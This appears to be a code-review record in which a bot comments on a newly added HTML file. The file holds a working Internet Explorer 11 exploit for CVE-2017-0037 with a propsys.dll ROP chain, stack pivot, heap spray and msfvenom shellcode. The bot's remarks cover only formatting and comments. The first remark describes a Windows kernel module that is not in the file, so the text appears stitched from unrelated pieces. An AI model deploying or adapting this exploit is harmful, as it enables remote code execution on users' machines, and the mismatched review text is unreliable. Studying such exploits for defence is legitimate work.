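Review bot: In `get_handle`, the early `return nil if result['return'] != 0` skips the `CloseHandle(handle)` that follows it, so a failed IOCTL leaks the device handle obtained from `open_device`; closing first and then checking the status, `session.railgun.kernel32.CloseHandle(handle)` followed by `return nil if result['return'] != 0`, keeps the cleanup on both paths. The module description says a hook is installed on `user32!LockWorkStation()`, while the code patches `LockWindowStation` in winlogon and triggers it by calling `LockWorkStation` from the session; if this is deliberate (winlogon's handling of the lock request reaching `LockWindowStation`), a one-line comment at `user32_functions = ['LockWindowStation']` saying so would prevent a reader from "fixing" the name. The 24-byte backup read at `winlogon.memory.read(address, 24)` is tied to the size of the trampoline assembled later (two `mov rax, imm64`, `push rax`, `jmp rax`); naming that dependency in a comment, or deriving the length from the assembled trampoline, would stop the two from drifting apart.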
@@ -0,0 +1,252 @@ +# Exploit Title: Microsoft Internet Explorer - 'mshtml.dll' Remote +Code Execution (MS17-007) +# Google Dork: NA +# Date: 24/7/2017 +# Exploit Author: Mohamed Hamdy - Nsecurity +# Vendor Homepage: https://www.microsoft.com +# Version: Microsoft Internet Explorer 11 +# Tested on: Windows 7 SP1 x86 +# CVE : CVE-2017-0037 + + changed to 0x6af5030f : # POP EBX # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ} + "%u9b7c%u6af3" + // 0x6af39b7c : ,# POP EAX # RETN 0x04 [PROPSYS.dll] + "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) + "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) + "%u45d5%uf076" + // 0xf07645d5 : ,# put delta into eax (-> put 0x00001000 into edx) + "%ue002%u6af9" + // 0x6af9e002 : ,# ADD EAX,0F89CA2B # RETN [PROPSYS.dll] + "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) + "%uaebc%u6af3" + // 0x6af3aebc : ,# XCHG EAX,EDX # RETN [PROPSYS.dll] + "%u9b7c%u6af3" + // 0x6af39b7c : ,# POP EAX # RETN 0x04 [PROPSYS.dll] + "%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040 + "%ua89e%u6af5" + // 0x6af5a89e : ,# NEG EAX # RETN [PROPSYS.dll] + "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) + "%u361b%u6af9" + // 0x6af9361b : ,# XCHG EAX,ECX # ADD DL,B # DEC ECX # RETN 0x08 [PROPSYS.dll] + "%u32cf%u6af7" + // 0x6af732cf : ,# POP EDI # RETN [PROPSYS.dll] + "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) + "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) + "%u40bd%u6af4" + // 0x6af440bd : ,# RETN (ROP NOP) [PROPSYS.dll] + "%ucef1%u6af8" + // 0x6af8cef1 : ,# POP ESI # RETN [PROPSYS.dll] + "%u177e%u6af7" + // 0x6af7177e : ,# JMP [EAX] [PROPSYS.dll] + "%u9b7c%u6af3" + // 0x6af39b7c : ,# POP EAX # RETN 0x04 [PROPSYS.dll] + "%u1244%u6af3" + // 0x6af31244 : ,# ptr to &VirtualAlloc() [IAT PROPSYS.dll] + "%u6af8" + // 0x6af80a14 : ,# PUSHAD # ADD AL,0 # MOV EAX,80004001 # POP EBP # RETN 0x08 [PROPSYS.dll] 
--> changed to 0x6af3a819 : # PUSHAD # CMP EAX,0C68B6AF3 # POP ESI # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ} + "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) + "%u720b%u6af5" + // 0x6af5720b : ,# ptr to 'jmp esp' [PROPSYS.dll] + + */ + + + + // Move ESP to the VirtualAlloc ROP chain + var stack_shift_rop = unescape( + writeu(0,235802130) + + writeu(base_leaked_addr,0x2030f) + // 0x6af5030f : # POP EBX # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ} + writeu(0,0x0e0e1258) + + writeu(base_leaked_addr,0x28002) + // 0x6af58002 : # MOV EAX,EBX # POP EBX # POP EBP # RETN 0x08 ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ} + writeu(0,0x41414141) + + writeu(0,0x41414141) + + writeu(base_leaked_addr,0x0b473) + //0x6af3b473 : # XCHG EAX,ESP # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ} + writeu(0,0x41414141) + + writeu(0,0x41414141) + + ""); + + + + + // root@kali:~# msfvenom -p windows/exec cmd=calc.exe -b "\x00" -f js_le + // ~2854 bytes max + + var shellcode = unescape("%uec83%u4070" + // move stack pointer away to avoid shellcode corruption + "%ucadb%ub6ba%u0f7b%ud99f%u2474%u5ef4%uc929%u31b1%uee83%u31fc%u1456%u5603%u99a2%u63fa%udf22%u9c05%u80b2%u798c%u8083%u0aeb%u30b3%u5e7f%uba3f%u4b2d%uceb4%u7cf9%u647d%ub3dc%ud57e%ud51c%u24fc%u3571%ue73d%u3484%u1a7a%u6464%u50d3%u99db%u2c50%u12e0%ua02a%uc660%uc3fa%u5941%u9a71%u5b41%u9656%u43cb%u93bb%uf882%u6f0f%u2915%u905e%u14ba%u636f%u51c2%u9c57%uabb1%u21a4%u6fc2%ufdd7%u7447%u757f%u50ff%u5a7e%u1266%u178c%u7cec%ua690%uf721%u23ac%ud8c4%u7725%ufce3%u236e%ua58a%u82ca%ub6b3%u7bb5%ubc16%u6f5b%u9f2b%u6e31%ua5b9%u7077%ua5c1%u1927%u2ef0%u5ea8%ue50d%u918d%ua447%u39a7%u3c0e%u27fa%ueab1%u5e38%u1f32%ua5c0%u6a2a%ue2c5%u86ec%u7bb7%ua899%u7b64%uca88%uefeb%u2350%u978e%u3bf3" + + ""); + + + var xchg = unescape(writeu(base_leaked_addr, 0x0b473)); // Initial EIP control ---> 0x6af3b473 : # XCHG EAX,ESP # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ} + var fix1 = 0x15c; + var fixop = unescape("%u0e0e%u0e0e"); + var 
offset_to_stack_shift = 0x6f7; + var offset_to_xchg = 0xd2+2; + // Jumping a bit around here, pretty sure this can be simplified but hey... it works + data = junk.substring(0,fix1-rop.length) + rop + fixop + shellcode + junk.substring(0,offset_to_stack_shift-fix1-fixop.length-shellcode.length) + stack_shift_rop + junk.substring(0,offset_to_xchg-stack_shift_rop.length) + xchg; + data += junk.substring(0,0x800-offset_to_stack_shift-offset_to_xchg-xchg.length); + + while (data.length < 0x80000) data += data; + for (var i = 0; i < 0x350; i++) + { + var obj = document.createElement("button"); + obj.title = data.substring(0,(0x7fb00-2)/2); + hso.appendChild(obj); + } + } + + function boom() { + document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa"; + th1.align = "right"; + } + + setTimeout(function() { + + var txt = document.getElementById("textarea"); + var il = txt.value.substring(0,2); + var leaked_addr = readu(il); + base_leaked_addr = leaked_addr - 0xbacc; // base of propsys + base_leaked_addr = base_leaked_addr.toString(16); + spray(); + boom(); + + }, 1000); // can be reduced + + + + + + + + +
    1
    + + + +
    + + \ No newline at end of file
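Review bot: The `# Exploit Title:` header at the top of this new file is wrapped onto two lines (`... 'mshtml.dll' Remote` followed by `Code Execution (MS17-007)`), while every other header entry is a single `# key: value` line, so anything parsing the header block will see the second half as an unlabeled line; joining it into one line, `# Exploit Title: Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)`, keeps it consistent with the rest of the header. The file is also added with mode `100755`, which an HTML file has no reason to carry; `100644` matches a plain text asset. Finally, the hard-coded constants in the script (`leaked_addr - 0xbacc`, `fix1`, `offset_to_stack_shift`, the gadget addresses in the commented ROP listing) are only explained by the `# Tested on: Windows 7 SP1 x86` header line, so a one-line comment next to them stating that they were computed for that specific environment's propsys.dll would make clear to a reader why the proof of concept is build-specific rather than general.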